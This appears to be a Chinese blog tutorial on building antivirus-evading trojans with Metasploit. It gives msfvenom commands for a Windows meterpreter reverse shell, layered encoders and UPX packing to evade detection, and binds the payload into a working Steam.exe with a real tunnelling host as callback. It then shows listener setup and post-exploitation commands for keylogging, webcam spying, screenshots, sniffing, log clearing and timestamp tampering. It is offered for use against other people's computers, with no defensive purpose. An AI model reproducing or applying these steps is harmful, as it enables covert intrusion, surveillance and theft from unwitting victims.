关于免杀(木马)的使用与msfcomsole的操作说明

关于免杀的具体使用方法与msfconsole的操作说明 =浩辰制作= 不喜勿喷 喜欢的可以三连一下
-----------------------------------------------------------------------------------------------------------------------------------------免杀的制作过程`

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.*** LPORT=**** -f exe -o /root/a.exe`

没有添加免杀,只是一个小后台 讲解一下 -a 设置目标的指令集架构,这里我们选择x86即可,因为86=32位 64=64位 一般64位的电脑都可以使用32位的系统–platform 设置目标平台,这里是windows,可以通过–help-platforms选项查看msfvenom支持的所有平台 ,你也可以使用手机系统来制作-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads查看所有攻击载荷 ,一般用的都是这个!-f 指定生成格式,可以是raw,exe,elf,jar,c语言的,python的,java的……,用–help-formats查看所有支持的格式,都可以!-o 是生成后台的软件 -o /root/a.exe其中/root/是指定位置LHOST 目标主机执行程序后连接我们 Kali 的地址LPORT 目标主机执行程序后连接我们 Kali 的端口 没有什么好讲的–回车—系统就生成好了–可以把软件放到,打开网站 http://www.virscan.org/ 进行测试看一下有没有病毒,现在没有搞免杀一般都是病毒
---------------------------------------------------------------------------------------------------------------------------------------免杀的制作方法

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.*** LPORT=**** -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 10 -b '\x00'-f exe -o /root/b.exe

添加免杀系统,和后台 讲一下前面的-a --platform -p -o 都是一样的-e 是开始添加编码器 比如 -e x86/shikata_ga_nai -i 10 其中的x86/shikata_ga_nai为一个编码器可以通过-l encoders来查看-i 指定编码迭代的次数,越多后台给扫出来的概率越小 | 是分割开来 然后重复一次 msfvenom -a x86 --platform windows
---------------------------------------------------------------------------------------------------------------------------------------加壳软件概念:upx打包器的原理非常简单,就是将可执行文件中的代码和数据进行压缩,然后将解压缩用的代码附加在前面,运行的时候先将原本的可执行数据解压出来,然后再运行解压缩后的数据。root@kali:~# upx b.exe 软件的名字然后等待
----------------------------------------------------------------------------------------------------------------------------------------现在来讲一个我认为很重要的给正常的程序捆绑木马,来更加提高免杀的效果

 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10869 -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 10 -b '\x00' -f exe -x Steam.exe -k -o /root/233/Steam.exe

前面的原理都一样只是-f exe -x Steam.exe -k -o /root/233/Steam.exe其中-x 指定模版 要添加木马的软件-o 添加完放到的位置其中 -k 是该选项可以保留模版原来的功能,本人认为是组要的核心!!!! 著,以上的都是内网穿透!!!
------回车就行----------------------------------------------------------------------------------------------------------------------==============================================================================msfconsole的操作说明

root@piloteer101:~# msfconsole监听模块:msf5 > use exploit/multi/handler    

连接监听链接。set payloads windows/meterpreter/reverset_tcp 启动配置文件set LHOST 192.168.1.104 这个是你上面自己填的ip记住!!一定是要kali的ip地址set LPORT 55555 连接端口这个也是你自己填写的exploit -j 开始监听 等别人点击你的免杀软件连接完成sessions #执行 sessions 命令查看已连接的会话sessions -i ID # sessions 加上会话 ID 号,
即可打开对应的会话连接拿到权限后命令:run vnc
#可以监控肉鸡桌面sysinfo
列出受控主机的系统信息。ls
列出目标主机的文件和文件夹信息。screenshot
对目标主机的屏幕进行截图。upload file 向目标主机上传文件。
download file 从目标主机下载文件。
keyscan_start 针对远程目标主机开启键盘记录功能。
keyscan_dump 存储目标主机上捕获的键盘记录。
keyscan_stop 停止针对目标主机的键盘记录。
uictl enable keyboard/mouse
接管目标主机的键盘和鼠标。background
将你当前的metasploit shell转为后台执行。use sniffer
加载嗅探模式。sniffer_interfaces
列出目标主机所有开放的网络端口。sniffer_dump interfaceID pcapname
在目标主机上启动嗅探。sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据。
sniffer_stop interfaceID
停止嗅探。clearev
清楚目标主机上的日志记录。timestomp
修改文件属性,例如修改文件的创建时间(反取证调查)。
reboot 重启目标主机。
#监控摄像头webcam commandswebcam_listwebcam_stream

  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值